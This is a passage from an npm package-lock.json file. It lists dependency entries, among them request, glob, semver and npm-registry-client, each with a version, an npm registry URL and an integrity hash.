"ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true }, "aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true }, "asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "requires": { "safer-buffer": "~2.1.0" } }, "assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==" }, "asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==" }, "aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", 
"integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "requires": { "tweetnacl": "^0.14.3" } }, "brace-expansion": { "version": "1.1.12", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz", "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==", "requires": { "concat-map": "0.0.1", "balanced-match": "^1.0.0" } }, "caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true }, "combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "requires": { "delayed-stream": "~1.0.0" } }, "concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "concat-stream": { "version": "1.6.1", "resolved": 
"https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.1.tgz", "integrity": "sha512-gslSSJx03QKa59cIKqeJO9HQ/WZMotvYJCuaUULrLpjj8oG40kV2Z+gz82pVxlTkOADi4PJxQPPfhl1ELYrrXw==", "requires": { "inherits": "^2.0.3", "typedarray": "^0.0.6", "readable-stream": "^2.2.2" } }, "console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "requires": { "assert-plus": "^1.0.0" } }, "delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==" }, "ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "requires": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": 
"sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==" }, "fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==" }, "form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "requires": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" } }, "fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==" }, "gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": 
"sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "requires": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": "^4.2.3", "strip-ansi": "^6.0.1", "wide-align": "^1.1.5" } }, "getpass": { "version": "0.1.7", "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", "requires": { "assert-plus": "^1.0.0" } }, "glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", "requires": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", "inherits": "2", "minimatch": "^3.1.1", "once": "^1.3.0", "path-is-absolute": "^1.0.0" } }, "graceful-fs": { "version": "3.0.12", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-3.0.12.tgz", "integrity": "sha512-J55gaCS4iTTJfTXIxSVw3EMQckcqkpdRv3IR7gu6sq0+tbC363Zx6KH/SEwXASK9JRbhyZmVjJEVJIOxYsB3Qg==", "requires": { "natives": "^1.1.3" } }, "har-schema": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==" }, "har-validator": { "version": "5.1.5", "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", "requires": { "ajv": "^6.12.3", "har-schema": "^2.0.0" } }, "has-unicode": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/has-unicode/-/has-unicode-2.0.1.tgz", "integrity": "sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", "optional": 
true }, "hasown": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.1.tgz", "integrity": "sha512-1/th4MHjnwncwXsIW6QMzlvYL9kG5e/CpVvLRZe4XPa8TOUNbCELqmvhDmnkNsAjwaG4+I8gJJL0JBvTTLO9qA==", "requires": { "function-bind": "^1.1.2" } }, "hosted-git-info": { "version": "2.8.9", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-2.8.9.tgz", "integrity": "sha512-mxIDAb9Lsm6DoOJ7xH+5+X4y1LU/4Hi50L9C5sIswK3JzULS4bwk1FvjdBgvYR4bzT4tuUQiC15FE2f5HbLvYw==" }, "http-signature": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", "requires": { "assert-plus": "^1.0.0", "jsprim": "^1.2.2", "sshpk": "^1.7.0" } }, "inflight": { "version": "1.0.6", "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", "requires": { "once": "^1.3.0", "wrappy": "1" } }, "inherits": { "version": "2.0.4", "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" }, "is-core-module": { "version": "2.13.1", "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", "requires": { "hasown": "^2.0.0" } }, "is-fullwidth-code-point": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", "optional": true }, "is-typedarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", 
"integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" }, "isarray": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", "integrity": "sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" }, "isstream": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" }, "jsbn": { "version": "0.1.1", "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" }, "json-schema": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "json-schema-traverse": { "version": "0.4.1", "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" }, "json-stringify-safe": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" }, "jsprim": { "version": "1.4.2", "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "requires": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", "json-schema": "0.4.0", "verror": "1.10.0" } }, "mime-db": { "version": "1.52.0", "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", "integrity": 
"sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" }, "mime-types": { "version": "2.1.35", "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", "requires": { "mime-db": "1.52.0" } }, "minimatch": { "version": "3.1.5", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.5.tgz", "integrity": "sha512-VgjWUsnnT6n+NUk6eZq77zeFdpW2LWDzP6zFGrCbHXiYNul5Dzqk2HHQ5uFH2DNW5Xbp8+jVzaeNt94ssEEl4w==", "requires": { "brace-expansion": "^1.1.7" } }, "minimist": { "version": "1.2.8", "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==" }, "mkdirp": { "version": "0.5.6", "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", "requires": { "minimist": "^1.2.6" } }, "natives": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/natives/-/natives-1.1.6.tgz", "integrity": "sha512-6+TDFewD4yxY14ptjKaS63GVdtKiES1pTPyxn9Jb0rBqPMZ7VcCiooEhPNsr+mqHtMGxa/5c/HhcC4uPEUw/nA==" }, "normalize-package-data": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/normalize-package-data/-/normalize-package-data-2.5.0.tgz", "integrity": "sha512-/5CMN3T0R4XTj4DcGaexo+roZSdSFW/0AOOTROrjxzCG1wrWXEsGbRKevjlIL+ZDE4sZlJr5ED4YW0yqmkK+eA==", "requires": { "hosted-git-info": "^2.1.4", "resolve": "^1.10.0", "semver": "2 || 3 || 4 || 5", "validate-npm-package-license": "^3.0.1" } }, "npm-package-arg": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/npm-package-arg/-/npm-package-arg-3.1.1.tgz", "integrity": "sha512-jOIv9ddxThaiiI6WH2kLOsUL0vpA1rb7laRZO45OxSzGAj1ouiW0uQLq4zK2LR82pjeBO64VmEHHgUXHkyCQRw==", "requires": { "hosted-git-info": 
"^1.5.3", "semver": "4" }, "dependencies": { "hosted-git-info": { "version": "1.6.0", "resolved": "https://registry.npmjs.org/hosted-git-info/-/hosted-git-info-1.6.0.tgz", "integrity": "sha512-hX2w5jrEx2C64DRfLMb5OKHrZ8ReEkssfcjmrSHVih7dH1FD/qVn3/DfqLRQme2/CXBgpN/iApgAhpdaY+rCRQ==" } } }, "npm-registry-client": { "version": "6.2.0", "resolved": "https://registry.npmjs.org/npm-registry-client/-/npm-registry-client-6.2.0.tgz", "integrity": "sha512-zFrsY9IAR3prA7lwKBWZXi/SdxPBbAQXFqQsbgGZXzECUda/8jVW2x3EfD+2h70o/PGio4K6rYvC/A/IoT1IOA==", "requires": { "chownr": "0", "concat-stream": "^1.4.6", "graceful-fs": "^3.0.0", "mkdirp": "^0.5.0", "normalize-package-data": "~1.0.1 || ^2.0.0", "npm-package-arg": "^3.0.0", "npmlog": "", "once": "^1.3.0", "request": "^2.47.0", "retry": "^0.6.1", "rimraf": "2", "semver": "2 >=2.2.1 || 3.x || 4", "slide": "^1.1.3" } }, "npmlog": { "version": "7.0.1", "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-7.0.1.tgz", "integrity": "sha512-uJ0YFk/mCQpLBt+bxN88AKd+gyqZvZDbtiNxk6Waqcj2aPRyfVx8ITawkyQynxUagInjdYT1+qj4NfA5KJJUxg==", "optional": true, "requires": { "are-we-there-yet": "^4.0.0", "console-control-strings": "^1.1.0", "gauge": "^5.0.0", "set-blocking": "^2.0.0" } }, "oauth-sign": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" }, "once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", "requires": { "wrappy": "1" } }, "path-is-absolute": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==" }, "path-parse": { "version": "1.0.7", "resolved": 
"https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==" }, "performance-now": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" }, "process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", "integrity": "sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==" }, "psl": { "version": "1.9.0", "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" }, "punycode": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==" }, "qs": { "version": "6.5.3", "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" }, "readable-stream": { "version": "2.3.8", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", "requires": { "core-util-is": "~1.0.0", "inherits": "~2.0.3", "isarray": "~1.0.0", "process-nextick-args": "~2.0.0", "safe-buffer": "~5.1.1", "string_decoder": "~1.1.1", "util-deprecate": "~1.0.1" } }, "request": { "version": "2.88.2", "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", "requires": { "aws-sign2": "~0.7.0", 
"aws4": "^1.8.0", "caseless": "~0.12.0", "combined-stream": "~1.0.6", "extend": "~3.0.2", "forever-agent": "~0.6.1", "form-data": "~2.3.2", "har-validator": "~5.1.3", "http-signature": "~1.2.0", "is-typedarray": "~1.0.0", "isstream": "~0.1.2", "json-stringify-safe": "~5.0.1", "mime-types": "~2.1.19", "oauth-sign": "~0.9.0", "performance-now": "^2.1.0", "qs": "~6.5.2", "safe-buffer": "^5.1.2", "tough-cookie": "~2.5.0", "tunnel-agent": "^0.6.0", "uuid": "^3.3.2" } }, "resolve": { "version": "1.22.8", "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", "requires": { "is-core-module": "^2.13.0", "path-parse": "^1.0.7", "supports-preserve-symlinks-flag": "^1.0.0" } }, "retry": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/retry/-/retry-0.6.1.tgz", "integrity": "sha512-txv1qsctZq8ei9J/uCXgaKKFPjlBB0H2hvtnzw9rjKWFNUFtKh59WprXxpAeAey3/QeWwHdxMFqStPaOAgy+dA==" }, "rimraf": { "version": "2.7.1", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz", "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==", "requires": { "glob": "^7.1.3" } }, "safe-buffer": { "version": "5.1.2", "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" }, "safer-buffer": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" }, "semver": { "version": "4.3.6", "resolved": "https://registry.npmjs.org/semver/-/semver-4.3.6.tgz", "integrity": "sha512-IrpJ+yoG4EOH8DFWuVg+8H1kW1Oaof0Wxe7cPcXW3x9BjkN/eVo54F15LyqemnDIUYskQWr9qvl/RihmSy6+xQ==" }, "set-blocking": { "version": "2.0.0", "resolved": 
"https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", "optional": true }, "signal-exit": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", "optional": true }, "slide": { "version": "1.1.6", "resolved": "https://registry.npmjs.org/slide/-/slide-1.1.6.tgz", "integrity": "sha512-NwrtjCg+lZoqhFU8fOwl4ay2ei8PaqCBOUV3/ektPY9trO1yQ1oXEfmHAhKArUVUr/hOHvy5f6AdP17dCM0zMw==" }, "spdx-correct": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", "requires": { "spdx-expression-parse": "^3.0.0", "spdx-license-ids": "^3.0.0" } }, "spdx-exceptions": { "version": 